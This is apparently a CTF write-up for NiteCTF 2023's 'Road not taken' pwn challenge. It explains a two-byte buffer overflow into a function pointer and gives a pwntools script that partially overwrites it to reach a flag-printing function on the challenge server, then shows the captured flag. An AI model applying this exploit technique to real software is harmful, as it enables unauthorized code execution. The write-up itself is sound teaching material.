NiteCTF 2023 : Road not taken

Context

We're given a binary and a remote server to be exploited.

Writeup

Upon opening the binary in, we find this decompiled pseudo-c code :

void main(void)

{
  undefined local_218 [520];
  code *local_10;

  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  local_10 = wrongdirection;
  puts("Can you please lead me to the right direction to get to the flag?");
  read(0,local_218,522);
  (*local_10)();
  return;
}

There's a function pointer and a 520 bytes array. Further down, we notice that 522 bytes is read and stored in the array so clearly there's a buffer overflow vulnerability here. We can overwrite the 2 last bytes of the function pointer that is initially set to wrongdirection. There's a function named rightdirection that prints our flag so we simply have to rewrite that function pointer to point to rightdirection that's at 0x1159.

And in order to do, we can execute this script :

from pwn import *

#r = process("./the_road_not_taken1")
r = remote("34.100.142.216",1337)

elf = ELF('./the_road_not_taken1')
addr_right_dir = elf.symbols["rightdirection"]
addr_wrong_dir = elf.symbols["wrongdirection"]
print(f'{hex(addr_right_dir)=}')
print(f'{hex(addr_wrong_dir)=}')
print(r.recvuntil(b"flag?\n").decode())
r.sendline(b"a"*520 + b"\x59\x11\x00")
print(r.recv().decode())

We have to run it multiple times but it'll eventually work and give us our flag.

$ py exploit.py
[+] Opening connection to 34.100.142.216 on port 1337: Done
[*] '/home/ravaka/ctf/nitectf/pwn/road_not_taken/the_road_not_taken1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
hex(addr_right_dir)='0x1159'
hex(addr_wrong_dir)='0x117e'
Can you please lead me to the right direction to get to the flag?

Thanks for the help
nite{R0b3rT_fro5t_ftw_32dx5hp}

[*] Closed connection to 34.100.142.216 port 1337